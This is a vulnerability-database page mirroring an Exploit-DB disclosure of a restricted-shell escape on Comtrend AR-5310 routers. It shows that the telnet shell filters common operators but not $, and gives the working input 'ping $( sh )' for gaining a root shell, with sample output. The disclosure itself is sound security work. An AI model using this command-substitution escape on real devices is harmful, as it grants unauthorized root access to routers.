Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Comtrend-AR-5310 - Restricted Shell Escape

🗓️ 22 Jul 2019 00:00:00Reported by AMRI AmineType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 174 Views

Comtrend AR 5310 - Restricted Shell Escape using $( subcommand

Code
# Exploit Title: Comtrend-AR-5310 - Restricted Shell Escape
# Date: 2019-07-20
# Exploit Author: AMRI Amine
# Vendor Homepage: https://www.comtrend.com/
# Version: GE31-412SSG-C01_R10.A2pG039u.d24k
# Tested on: Linux (busybox)

TL;DR: A local user can bypass the restricted shell using the command substitution operator $( commmand )

Comtrend AR 5310 routers have a restricted shell, the list of command a user can execute is

[ ? help logout exit quit reboot ads lxdslctl xtm loglevel logdest virtualserver ddns dumpcfg dumpmdm meminfo psp dumpsysinfo dnsproxy syslog ifconfig ping sntp sysinfo tftp wlan wlctl vlanctl arp defaultgateway dhcpserver dns lan lanhosts passwd ppp restoredefault route nslookup traceroute save uptime exitOnIdle wan build version serialnumber modelname acccntr upnp urlfilter timeres tr69cfg logouttime ipneigh dhcp6sinfo nat mcpctl ]

Usual terminal constructs like:

    the command separator ";"
    the control operator "&" (run in forground)
    the redirection operator (pipe) "|"
    the command substitution operator "`"

are all filtered as shown here :

 > ;
Warning: operator ; is not supported!
telnetd:error:476.449:processInput:490:unrecognized command 
 > |
Warning: operator | is not supported!
telnetd:error:484.871:processInput:490:unrecognized command 
 > &
Warning: operator & is not supported!
telnetd:error:487.421:processInput:490:unrecognized command 
 > `
Warning: operator ` is not supported!
telnetd:error:495.334:processInput:490:unrecognized command 

Still the $ operator is not filtered:

 > $
telnetd:error:497.862:processInput:490:unrecognized command $

Here i came to the conclusion that invoking a command with $( subcommand ) as argument would give an obvious shell

> ping $( sh )                                                              
exec >&2                                                                     
ps x | grep telnet                                                           
18333 root      4164 S    telnetd -m 0                                       
18334 root      4168 S    telnetd -m 0                                       

EOF

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
22 Jul 2019 00:00Current
7High risk
Vulners AI Score7
comtrend ar 5310restricted shellescapelinuxcommand substitutiontelnetshell
174